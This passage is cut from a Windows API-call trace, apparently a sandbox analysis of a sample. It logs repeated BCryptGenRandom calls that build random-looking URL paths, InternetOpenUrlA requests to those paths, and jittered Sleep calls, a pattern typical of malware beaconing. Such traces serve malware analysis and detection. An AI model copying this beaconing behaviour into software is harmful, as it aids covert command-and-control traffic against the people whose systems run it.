(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.614] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.614] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0168.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.615] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.615] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0168.616] GetProcessHeap () returned 0x440000 [0168.616] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472f30 [0168.616] lstrcpyA (in: lpString1=0x472f30, lpString2="\x81\x03" | out: lpString1="\x81\x03") returned="\x81\x03" [0168.616] lstrcatA (in: lpString1="\x81\x03", lpString2="/iwkvvmscU2idx1scu3L0lyk6k2y8EfsNrz8cigcG795gqw4/dfjsjv3hnbin5eyo7u9wumj6vumDxqC/pvQigybCfT6mg3pf7Zcagjfzcl91jioiib2bt09Rmr1io/" | out: lpString1="\x81\x03/iwkvvmscU2idx1scu3L0lyk6k2y8EfsNrz8cigcG795gqw4/dfjsjv3hnbin5eyo7u9wumj6vumDxqC/pvQigybCfT6mg3pf7Zcagjfzcl91jioiib2bt09Rmr1io/") returned="\x81\x03/iwkvvmscU2idx1scu3L0lyk6k2y8EfsNrz8cigcG795gqw4/dfjsjv3hnbin5eyo7u9wumj6vumDxqC/pvQigybCfT6mg3pf7Zcagjfzcl91jioiib2bt09Rmr1io/" [0168.616] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0168.616] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x81\x03/iwkvvmscU2idx1scu3L0lyk6k2y8EfsNrz8cigcG795gqw4/dfjsjv3hnbin5eyo7u9wumj6vumDxqC/pvQigybCfT6mg3pf7Zcagjfzcl91jioiib2bt09Rmr1io/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0168.616] GetProcessHeap () returned 0x440000 [0168.616] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472f30 | out: hHeap=0x440000) returned 1 [0168.616] GetProcessHeap () returned 0x440000 [0168.616] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17200 | out: hHeap=0x440000) returned 1 [0168.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0168.617] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0168.617] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0168.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0168.618] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0168.618] Sleep (dwMilliseconds=0xff57) [0169.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0169.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.189] GetProcessHeap () returned 0x440000 [0169.189] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0169.189] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.189] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x16, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0169.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.190] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.190] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.193] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.193] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b267, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a1b267) returned 0x0 [0169.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.194] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.194] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.195] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.196] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.196] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0169.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.197] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.197] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.198] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.198] GetProcessHeap () returned 0x440000 [0169.198] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473980 [0169.198] lstrcpyA (in: lpString1=0x473980, lpString2="P²¡\x03" | out: lpString1="P²¡\x03") returned="P²¡\x03" [0169.198] lstrcatA (in: lpString1="P²¡\x03", lpString2="/eubwF8t7k7c5cwkc91hep/s5hyf2zcojccuj671VjKmc/" | out: lpString1="P²¡\x03/eubwF8t7k7c5cwkc91hep/s5hyf2zcojccuj671VjKmc/") returned="P²¡\x03/eubwF8t7k7c5cwkc91hep/s5hyf2zcojccuj671VjKmc/" [0169.198] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0169.198] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P²¡\x03/eubwF8t7k7c5cwkc91hep/s5hyf2zcojccuj671VjKmc/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0169.198] GetProcessHeap () returned 0x440000 [0169.198] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473980 | out: hHeap=0x440000) returned 1 [0169.198] GetProcessHeap () returned 0x440000 [0169.199] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0169.199] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0169.199] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0169.200] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.200] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0169.200] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0169.200] Sleep (dwMilliseconds=0x1a1ed) [0169.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.422] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0169.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.423] GetProcessHeap () returned 0x440000 [0169.423] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02050 [0169.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02051, cbBuffer=0x17, dwFlags=0x2 | out: pbBuffer=0x3a02051) returned 0x0 [0169.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.423] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.423] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.425] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.426] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0169.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02068, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a02068) returned 0x0 [0169.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.427] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.428] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.428] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.429] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0169.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0169.430] 